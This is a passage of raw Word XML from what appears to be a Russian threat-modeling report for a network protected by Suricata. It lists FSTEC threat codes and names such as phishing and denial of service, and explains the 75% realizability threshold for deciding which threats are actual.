              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13FE3F60"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УБИ.140</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5668" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1BD20498"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 xml:space="preserve">Угроза приведения системы в состояние «отказ в обслуживании» </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6306EFF7"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567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C30D224"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59" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17FA68C7"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r w:rsidR="00ED2018" w:rsidRPr="000E29DB" w14:paraId="234EF81F" w14:textId="77777777" w:rsidTr="00ED2018">
        <w:trPr>
          <w:trHeight w:val="840"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5FD81934"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УБИ.153</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5668" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="004BBA42"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 xml:space="preserve">Угроза усиления воздействия через сторонние серверы </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74352BB3"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567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36DA54EF"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59" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70F9340E"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r w:rsidR="00ED2018" w:rsidRPr="000E29DB" w14:paraId="5984AF17" w14:textId="77777777" w:rsidTr="00ED2018">
        <w:trPr>
          <w:trHeight w:val="694"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="131A4344"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УБИ.159</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5668" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="719333D5"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Угроза «форсированного веб-браузинга»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3738720F"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567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B7C70B6"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59" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FFC9FA1"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r w:rsidR="00ED2018" w:rsidRPr="000E29DB" w14:paraId="109E49FC" w14:textId="77777777" w:rsidTr="00ED2018">
        <w:trPr>
          <w:trHeight w:val="845"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C3DA09A"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УБИ.167</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5668" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="534707B7"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Угроза заражения при посещении неблагонадёжных сайтов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66FFD42A"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567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F7B438B"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59" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36DB281A"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r w:rsidR="00ED2018" w:rsidRPr="000E29DB" w14:paraId="60E64884" w14:textId="77777777" w:rsidTr="00ED2018">
        <w:trPr>
          <w:trHeight w:val="686"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B194E41"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УБИ.168</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5668" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74DBEF53"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Угроза «кражи» учётной записи</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34792995"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567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="273CF84C"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59" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="690E33CE"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r w:rsidR="00ED2018" w:rsidRPr="000E29DB" w14:paraId="05D735C4" w14:textId="77777777" w:rsidTr="00ED2018">
        <w:trPr>
          <w:trHeight w:val="709"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F2713CE"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УБИ.175</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5668" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="392F99FB"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Угроза «фишинга»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72330B58"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567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B473504"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59" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65C9B2A4"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r w:rsidR="00ED2018" w:rsidRPr="000E29DB" w14:paraId="4D1BB00A" w14:textId="77777777" w:rsidTr="00ED2018">
        <w:trPr>
          <w:trHeight w:val="1128"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D3A749B"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УБИ.186</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5668" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06982AD0"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Угроза внедрения вредоносного кода через рекламу, сервисы, контент</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16AF3280"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567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A31102C"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59" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27464040"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r w:rsidR="00ED2018" w:rsidRPr="000E29DB" w14:paraId="4ECAFAB8" w14:textId="77777777" w:rsidTr="00ED2018">
        <w:trPr>
          <w:trHeight w:val="1125"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D9FC876"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УБИ.221</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5668" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31C45C4F" w14:textId="0B3CA49E" w:rsidR="00ED2018" w:rsidRPr="00DD2F4C" w:rsidRDefault="00ED2018" w:rsidP="00ED2018">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Угроза модификации модели машинного обучения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5516229B"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D3A8154"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5880585E" w14:textId="77777777" w:rsidR="00ED2018" w:rsidRPr="000E29DB" w:rsidRDefault="00ED2018" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E29DB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>75%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C014640" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37F0E42F" w14:textId="4960872A" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00357C00">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF2AF5">
        <w:rPr>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">На основании подсчета коэффициента реализуемости угроз (Y), определяем наиболее актуальные угрозы для сетевой инфраструктуры под защитой </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF2AF5">
        <w:rPr>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF2AF5">
        <w:rPr>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Согласно методике ФСТЭК, если коэффициент реализуемости угрозы превышает или равен 75%, то данная угроза признаётся актуальной и требует разработки соответствующих контрмер.</w:t>
      </w:r>
      <w:r w:rsidR="00ED2018" w:rsidRPr="00ED2018">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED2018" w:rsidRPr="00ED2018">
        <w:rPr>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Из рассмотренного перечня угроз к актуальным отнесены те, для которых совокупность условий реализации и возможностей нарушителя создаёт реальный риск нанесения ущерба информационной системе.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Актуальные угрозы представлены в таблице 6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5686DCDE" w14:textId="77777777" w:rsidR="002E66B7" w:rsidRPr="00ED2018" w:rsidRDefault="002E66B7" w:rsidP="002E66B7">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="340"/>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED53F21" w14:textId="77777777" w:rsidR="00ED2018" w:rsidRPr="00ED2018" w:rsidRDefault="00ED2018" w:rsidP="002E66B7">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="340"/>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4684D17F" w14:textId="76DCD801" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="002E66B7">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="340"/>
        <w:rPr>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Таблица 6 - Актуальные угрозы</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9634" w:type="dxa"/>
        <w:tblInd w:w="5" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1268"/>
        <w:gridCol w:w="6524"/>
        <w:gridCol w:w="850"/>
        <w:gridCol w:w="992"/>
      </w:tblGrid>
      <w:tr w:rsidR="00357C00" w:rsidRPr="00DA2A81" w14:paraId="2CBAD459" w14:textId="77777777" w:rsidTr="00357C00">
        <w:trPr>
          <w:trHeight w:val="855"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ED5E692"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Код угрозы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6524" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
